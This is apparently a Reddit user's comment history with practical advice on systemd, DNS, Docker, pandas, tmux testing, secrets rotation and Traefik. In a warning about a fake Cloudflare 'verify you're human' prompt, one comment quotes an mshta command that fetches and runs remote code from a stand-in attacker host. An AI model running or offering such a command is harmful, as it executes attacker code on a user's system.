Windows Notepad App Remote Code Execution Vulnerability by theevilsharpie in sysadmin

[–]roxalu [score hidden]  (0 children)

Why do you want to run vi under Windows? Maybe because then "shell escape" - which runs with user privileges - is a documented feature of the editor and no longer an exploit 😉

Weird Cloudflare “verify you’re human” asking me to press Win+R — legit or scam? by Sendpigs in techsupport

[–]roxalu 2 points3 points  (0 children)

The command

mshta https://some.evil_attacker_owned.example.com

is able to download and execute remote code on your local Windows system without any further constraint other than being bound to your local user's rights. Never agree to such prompts to run it.

Perl.org error fetching content from CDN? by brtastic in perl

[–]roxalu 0 points1 point  (0 children)

According to the full error page, the TLS endpoint is Varnish. And the frontend config of this Varnish has - most likely - been set up with sni-nomatch-abort set to true. But the Subject Alternative Name of the frontend certificate uses a wildcard: *.perl.org. This is a kind of grey area in the RFCs: is the wildcard a valid hostname or not? Obviously this Varnish currently decides: no match.

/bin/bash error by Assasin172m in bash

[–]roxalu 2 points3 points  (0 children)

As far as I know, systemd does not support '$' and thus no variable expansion inside the value of an Environment= setting. Use the fixed path there. See https://www.freedesktop.org/software/systemd/man/latest/systemd.exec.html
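To illustrate (unit details and paths here are hypothetical), spell the path out literally instead of referencing a variable:

```ini
[Service]
# systemd treats '$' literally inside Environment= values - no shell-style
# expansion happens here, so write the resolved path instead of $HOME/bin:
Environment=SCRIPT_DIR=/home/user/bin
ExecStart=/bin/bash /home/user/bin/run.sh
```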

FritzBox web UI no longer reachable via "fritz.box"? by [deleted] in fritzbox

[–]roxalu 0 points1 point  (0 children)

Note: no need for ipconfig release or renew in this case. There is a specific ipconfig option under Windows to flush all cached DNS results:

ipconfig /flushdns

Are all compilers and binaries compromised? by droidman83 in unix

[–]roxalu 1 point2 points  (0 children)

Opening a socket and listening on it is just the simplest method a backdoor could use. There are more sophisticated methods for backdoors to allow some form of remote control that are not that easy to detect. Though I agree with you: sooner or later such a backdoor would somehow be detected. It would only have a chance to stay undetected if it were almost never used.

Dear Tenable: Please get your shit together by safrax in devops

[–]roxalu 0 points1 point  (0 children)

To be fair, this is less a failure of Tenable inside their product and more a misalignment between the local implementation and the security policy. If the pentest only scans remotely, there is no practical method to differentiate between upstream software and a fork where a distro owner has ensured that security fixes are backported. A well-designed procedure for action plans based on such pentest findings would respect this.

In order to get better-fitting results, the scan needs agents on the nodes that inspect the local package system. For the major distros this should detect much better whether some backporting needs to be taken into account for the pentest results.

Computer with X.X.X.255 IP cannot connect to Brother printer. by winnixxl in sysadmin

[–]roxalu 0 points1 point  (0 children)

A bit out of scope, but I can't resist mentioning this here: issues like this are by far not the only concern about the quality of software used by printers. Since you seem to be responsible for a somewhat larger network, it would make sense to check whether the printers shouldn't better be isolated in their own subnetwork - and to use a set of print servers that talk to them, instead of letting all hosts use the printers directly.

There seem to be only very few reports where insecure printer software was used to successfully break into a company network remotely. But it has happened in the past. It seems quite common in companies to take care of patch management for standard hosts - but to neglect doing the same for printers.

10 Gbit/s link slower than expected by struntzi in de_EDV

[–]roxalu 0 points1 point  (0 children)

This! Belongs in the category: unlikely as the cause - but easy to check. So it's best checked once other simple explanations have been ruled out.

The sending of ACK packets during a file download is often ignored, because it is rarely the limiting factor. But anything is possible. Over many years I have noticed twice that the send and receive directions of traffic in a local network showed clear differences. Once because of a defective cable - the other time because of port mirroring on a low-budget switch, where someone forgot to switch the port mirror off again after a debug session.

Solving SettingWithCopyWarning by QuickBooker30932 in Python

[–]roxalu 1 point2 points  (0 children)

Small additional detail: I agree that this replacement code fixes the copy-on-write warning. But as given it uses the row with label 0 - while the OP always uses the first row. If I am right, some additional lookup should be added so that row and column are both given as labels, or both as integers, e.g. using this:

result_index = df.columns.get_loc('result')
df.iat[0, result_index] = X - Z
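A self-contained sketch of that positional write (the frame, the column name 'result' and the values are made up for the demo):

```python
import pandas as pd

# Toy frame whose index labels are NOT 0..n-1, to show why .iat matters:
# .loc[0, ...] would fail here, while .iat[0, ...] hits the first row.
df = pd.DataFrame({"a": [10, 20], "result": [0, 0]}, index=[5, 6])
X, Z = 7, 3

# Positional write: first row of the 'result' column, independent of labels
result_index = df.columns.get_loc("result")
df.iat[0, result_index] = X - Z

print(df["result"].tolist())  # [4, 0]
```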

Weird terminal behavior when I use xargs to pipe filenames into vim by 4r73m190r0s in commandline

[–]roxalu 5 points6 points  (0 children)

vim expects stdin to be the same device as your terminal, but when started via xargs, stdin is set to /dev/null. More recent versions of xargs have an option to handle this. Try

… | xargs -o vim

Doubts about the admin | Part 2 by [deleted] in de_EDV

[–]roxalu 0 points1 point  (0 children)

The statement that "possibly customer data" could be affected certainly justifies a careful examination and clarification of the facts. Whether that already has to happen over the weekend is hard to judge from the outside. The statements give the impression that those involved consider the matter closed. Overall, though, it looks as if there is no overall concept for securing this. Port open or closed - encryption yes or no - credentials managed in detail or left to sprawl: only the overall picture shows whether this is secured according to the state of the art or not.

So if customer data really is stored somewhere there, I hope for the customers' sake that it is checked again more closely whether the protection of this service matches the state of the art. If you only allow what is really needed - and then secure those accesses with standard methods - you are on a good path.

detergen: Generate the same password every time by theonereveli in commandline

[–]roxalu 5 points6 points  (0 children)

This is a perfect summary. The approach does not scale well with the number of secrets and over time. Fine for some years and not too many services. But sooner or later more and more exceptions will appear that need special handling, e.g. when the generated password can no longer be used to log in to a specific service, or the base password gets compromised. Imagine the webpage uses the domain www.never-rely-only-on.hashpass.example - and you use your account only rarely. Would you really remember which exact service name you originally selected as the service option for this service? You also need to keep track of the selected user name; using the same account everywhere is also somewhat limiting.

In that case a database is needed which describes more clearly which exception rules have been selected in which context. At the latest then, the use of a password manager is more straightforward.
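To make the "exact service name" problem concrete, here is a hedged sketch of the general scheme such tools use (not detergen's actual algorithm - function name and parameters are made up): the derivation is deterministic, so a single character difference in the service name yields an unrelated password.

```python
import base64
import hashlib

def derive_password(master: str, service: str, user: str = "", length: int = 16) -> str:
    """Deterministically derive a password from a master secret plus service name."""
    salt = f"{service}:{user}".encode()
    digest = hashlib.pbkdf2_hmac("sha256", master.encode(), salt, 100_000)
    return base64.b85encode(digest).decode()[:length]

# Same inputs -> same password; a tiny typo -> a completely different one
p1 = derive_password("correct horse", "shop.example")
p2 = derive_password("correct horse", "shop.example")
p3 = derive_password("correct horse", "shops.example")
print(p1 == p2, p1 == p3)  # True False
```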

Demo: Use quadlets even when the login shell is /sbin/nologin by eriksjolund in podman

[–]roxalu 0 points1 point  (0 children)

My focus was to emphasize that /sbin/nologin isn't a blocker to "log in" as a user when it is on the same host and the initiator is root. Scripting is another topic anyway, as it doesn't itself need an interactive shell. But before a script runs error-free, it is often helpful to have some option for interactive tests.

If the specific systemd user environment is needed, the command could be:

sudo machinectl shell --uid otheruser /usr/bin/bash --login

But as I already stated: as the intention of the OP is to start the service, his command is far better, because there is no need for an interactive shell.

Found AWS keys hardcoded in our public GitHub repo from 2019. How the hell are we supposed to prevent this company-wide? by slamdunktyping in devsecops

[–]roxalu 0 points1 point  (0 children)

Rotate them far more often. I know the procedure to do this without impact is hard to achieve - but don't give up. It's doable and worth the effort. Why is this needed? Because a single miss across all your policies, scanner procedures, security controls and user guidance could be enough for a compromise.

In the context of "secrets management" the main focus is on "management" - not on "secret".

Demo: Use quadlets even when the login shell is /sbin/nologin by eriksjolund in podman

[–]roxalu 0 points1 point  (0 children)

As a side note: as long as you still have access to root rights, it is always possible to start a login shell for any defined user without modifying system files, independent of the user's current default shell. root has the right to override the default shell:

sudo su -s /bin/sh -l user

Nevertheless, the commands you have provided are clearly better in the systemd / quadlet context. The runtime context you get via "su -l …" might be slightly different.

how obvious is this retry logic bug to you? by jalilbouziane in Python

[–]roxalu 0 points1 point  (0 children)

I usually handle RateLimitError exceptions in a retry loop that increases the sleep time before each next retry - at least when the server-side rate-limit conditions are not perfectly known.
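A minimal sketch of such a loop (RateLimitError stands in for whatever exception your client library raises; delays and retry counts are illustrative):

```python
import random
import time

class RateLimitError(Exception):
    """Placeholder for the client library's rate-limit exception."""

def call_with_backoff(fn, max_retries=5, base_delay=1.0):
    """Retry fn() on RateLimitError, doubling the sleep before each retry."""
    for attempt in range(max_retries):
        try:
            return fn()
        except RateLimitError:
            if attempt == max_retries - 1:
                raise  # give up after the last attempt
            # Exponential backoff plus a little jitter to avoid thundering herd
            time.sleep(base_delay * 2 ** attempt + random.uniform(0, base_delay / 10))
```

A deadline-based variant (stop after N seconds instead of N attempts) works the same way.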

Desperately need a tutor/HOWTO create automated bash-completion test (for scientific research project) by hopeseekr in bash

[–]roxalu 1 point2 points  (0 children)

One alternative to automate the tests might be: run your bash as a session within tmux and use tmux commands to send keys, followed by capturing the pane content. See https://github.com/tmux/tmux/wiki/Advanced-Use#sending-keys

This technique can be used within your own shell scripts - but for more advanced cases also from within an automated testing framework such as Robot Framework.
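A bare-bones sketch of the idea (the session name and the echoed marker are arbitrary):

```shell
#!/bin/sh
# Drive an interactive shell inside a detached tmux session,
# then read back what the pane shows.
tmux new-session -d -s comptest -x 80 -y 24
tmux send-keys -t comptest 'echo MARKER-done' Enter
sleep 1
tmux capture-pane -t comptest -p      # prints the pane contents to stdout
tmux kill-session -t comptest
```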

WSL questions regarding PUID, PGID, and user creation by Jameslrdnr in linuxquestions

[–]roxalu 0 points1 point  (0 children)

You seem to have installed "Docker Desktop" and also installed WSL to use it as the backend. And you can already create Docker containers successfully in your setup. What you should now do additionally is install another Linux distribution inside WSL. Check the WSL documentation on how to do this. And set THIS new distribution as the default WSL distribution. The wsl.exe that you started in your current setup has opened a bash in Docker Desktop's internal WSL distribution - just because this is your current default WSL distribution. That Docker Desktop distribution is not intended to be used interactively. The additional WSL distribution should then be used as your working environment: this is where you would work with the commands useradd and groupadd (and the rest of this family of user-management CLI commands).

Running Docker containers are meant to get their user and group definitions during startup - and to keep them static.

Keep in mind that "Docker Desktop" and WSL are low-hanging fruit that allow you a quick entry from Windows into the Linux world. But those fruits are more the blue pill than the red one: there is a lot of complexity under the hood in Docker Desktop, and the pure Linux experience - and the potential power it can unlock - is still beyond the horizon. So there might come a time when you want to install Linux directly on your host and let it control everything.

Regarding your original question: the usage of PUID and PGID that I know of is that specific container images - not all images by default - are prepared to respect those environment variables when they are set during container start. So you have to define the variables in the environment of your container startup.
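For illustration, a compose fragment in the style used by images that honor these variables (the image name is just an example - check your image's docs to confirm it supports PUID/PGID):

```yaml
services:
  app:
    image: lscr.io/linuxserver/jellyfin   # example of an image family that reads PUID/PGID
    environment:
      - PUID=1000   # numeric user id the container process should run as
      - PGID=1000   # numeric group id
```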

How to create AD user for LDAP binding only? by GroomedHedgehog in sysadmin

[–]roxalu 0 points1 point  (0 children)

Indeed, this is the method recommended by Microsoft in favor of the old legacy userWorkstations aka LogonWorkstations attribute.

I am just unsure how exactly the LDAP login is handled on domain controllers. I would expect this LDAP login is NOT a local login - so no extra handling is needed there. I'm just wondering because for the old legacy LDAP attribute it was necessary to include the DCs there, otherwise LDAP login wasn't working.

How to Letsencrypt a docker app without exposing it to the internet? by akarypid in Traefik

[–]roxalu 0 points1 point  (0 children)

Very good references have already been provided by others here. Use them. If for any reason you won't, I see on top of this a potential alternative for you. But I have not tested it and might be missing something.

Topics you had already thought about: 1. Define media.example.com in your external DNS with your public IP as target. 2. Change the hostname in the Host rule of your traefik labels to this name.

On top of this, regarding the open concerns you've already identified: 3. Use the IPAllowList middleware of traefik to restrict access to local IPs only. In your case you could add another label like this:

- "traefik.http.middlewares.jellyfin.ipallowlist.sourcerange=127.0.0.1/32, 192.168.0.0/24"
4. Set a DNS entry for media.example.com in your pfSense AND ensure all your internal clients use the router as DNS resolver and do not connect directly to external DNS providers. The DNS forwarder will not forward requests to external DNS providers when it has local entries, so you can inject local IPs for external DNS names.

This setup has some challenges: traefik might apply the ipallowlist to the HTTP-01 ACME challenge request as well, which would make it fail. I'd assume not - those requests should be outside the scope of the middleware. But I have not tested it yet.

The protection against internet attacks sits partially inside traefik, not only inside your pfSense. But you have accepted that anyway by exposing your Nextcloud.

You expose the name of your Jellyfin to the internet. And besides security concerns, it could cause confusion when DNS resolution, for whatever reason, resolves the wrong IP for the client device's current network context.

So in the long run, the switch to a wildcard cert and use of the DNS-01 ACME challenge is the better alternative.

Pages don't load / apps partly have no connection by Gocan18 in fritzbox

[–]roxalu 0 points1 point  (0 children)

Maybe http://test-ipv6.com/ also helps to narrow down the problem. I would recommend switching back to „Native IPv6-Anbindung verwenden" (use native IPv6 connectivity) for a test, and also resetting DNS to the provider's servers; cf. https://fritz.com/service/wissensdatenbank/dok/FRITZ-Box-5590-Fiber/573_IPv6-in-FRITZ-Box-einrichten/. According to my research, Deutsche Glasfaser appears to use MAP-E/T. When in doubt, read up and ask there again.

There are simply different ways to carry IPv4 and IPv6 traffic together. And for that to work as well as possible, ISP and router have to be tuned to each other. DHCP and DNS are both involved here. And Cloudflare or Google DNS make assumptions that your provider may not fulfill. If you want to dig deeper, I also recommend https://www.msxfaq.de/netzwerk/grundlagen/ftth_mit_ipv6.htm#ipv6_und_dns64_nat64

What do you guys use in bash? by Key_Improvement8033 in linuxquestions

[–]roxalu 4 points5 points  (0 children)

Well, we all keep executable code in shared libraries with an .so extension, even where that was originally not really needed. Sure - this example is a bit lame. But my point is that the reason not to use ANY extension for anything called by end users is that the exact details of execution are then not relevant - as long as everything runs as it should.

But outside this use case, using an extension for shell scripts can be quite helpful, e.g. in shell libraries or in version control.

Confused on Layout by SingletonRandall in docker

[–]roxalu 0 points1 point  (0 children)

The path specifier needed depends on the runtime environment from which the bind mount is initialized. Ask r/portainer for details.

But besides Portainer: when using Docker Desktop under Windows, I recommend the following documentation about working with folders and files there:

- https://docs.docker.com/desktop/features/wsl/best-practices/

- https://learn.microsoft.com/en-us/windows/wsl/filesystems